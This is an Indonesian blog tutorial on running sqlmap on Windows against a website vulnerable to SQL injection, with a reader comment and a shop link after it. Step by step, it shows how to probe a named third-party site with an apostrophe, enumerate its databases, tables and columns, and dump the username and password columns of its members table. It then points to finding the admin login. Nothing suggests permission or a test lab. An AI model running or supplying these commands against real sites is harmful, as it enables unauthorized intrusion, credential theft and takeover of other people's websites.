Tuturial sqlamp secara lengkap di windows, bagi sobat yang menemukan bug pada website dan ingin scan database website itu anda bisa menggunakan tools SQLMAP di windows
Phyton : download disini
Sqlmap : download disini
setelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln
1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini
Spoiler :
![[Image: 1.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTuWsZufpKYp5eK5eV9jA3q6H5-qswOIBSIPjLPHS6J1XBkhyL8AaQUIhlx_loM9Lg4rlWMf8HIickUKMKICvTmZ9Yy9tIB7M6gfMI-K_13zMNF1RWvzWIkgBwdtc_T6s-JYzwHCio0Ixz/s400/1.PNG)
5. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R
6. Ketik pada CMD dengan Perintah cd/ lalu ketik lagi perintah cd/sqlmapsehingga tampak seperti gambar berikut ini
Spoiler :
![[Image: 2.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4jwcq5c5_OsslgEFSAS0t3O9YN7bBeLGODeGw6l_PkTTZ_9U7R-MRJP5FyaiHthXwEcelD4bv0AWmg-7kuh2rbqhCzYPHEflZsfE1Z5na0mXXQnbLXV9VgIovMZE9xALxDLPdX7gC58-P/s640/2.PNG)
Contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 --dbslalu Tekan Enter
Spoiler :
![[Image: 3.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwiq0cZDXjYKwsDZRPCt57La7V8RC4PriJDF9PkR4bHI7FBmvxNG3osh8JrHFxtzTFUQ6_fPh_thW2aSZshXOJjhDVugWOgqYhNyvVC5idN6zbHo24YqnXGplLePvARvJJfWmk9bMzXy8c/s1600/3.PNG)
8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya
dengan perintah sqlmap.py -u Url Target - D nama database --tables
contoh : sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tables
Maka hasil nya akan seperti ini
Spoiler :
![[Image: 4.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvH3_4flLzWXSfUIWVjOusrjLGIRkE34Ja0nfb0UBmhy4mE7mF4q1o0DeICeprmreKtDlstPQdeRD_-BVu2lGqisvGl2mOnzPFD-Opk0I_SpGGUs_iMPFnXauEMVDytH5Y43xzSgsHfWOZ/s1600/4.PNG)
9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut ( cari menurut kalian di table mana terdapat user name dan password admin web nya )
ane coba scan table Members aja
dengan perinta sqlmap.py -u Url Target - D nama_database -T nama_table --columns
contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columns
lalu tekan enter dan hasil nya seperti ini
Spoiler :
![[Image: 5.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu-b2khlh7v7NtKLOMalcPANfDrhRwWRjIsdQ6lfFpd15NGd6nTwwGa57vjTY9jxHXEcn5J9kjS-DblOuXJgeGPoZMXNk6gKM0IXGBUoy-_DYmoFkLkrNQ3-E9WiyVYaS9vqLa6ToITdOD/s1600/5.PNG)
10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintah sqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump
contoh :
sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump
lalu tekan enter ,
11. setelah kita tekan enter makan akan muncul username dan password nya seperti gambar berikut
Spoiler :
![[Image: 6.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZVIObF1g-6R_uIU3dD0exAq1YRdrZr8Xp7Gr_FcgvTEgxk91Xlxf5Z1DQX1H4ww-l3I7bV_eOzTUxjqqeTucRdTow5XRUJhiC7bbyOS-R17xubTPAB8fgb7nnmdLGBuu6ylocHW2sdbbz/s1600/6.PNG)
tinggal kita cari login admin nya
sekian dlo tutor dari ane mudah"an bermanfaat y Gan
terimakasih sudah share gan, manteb sekali
BalasHapushttps://www.tokopedia.com/mmionline/etalase/blower-solder-uap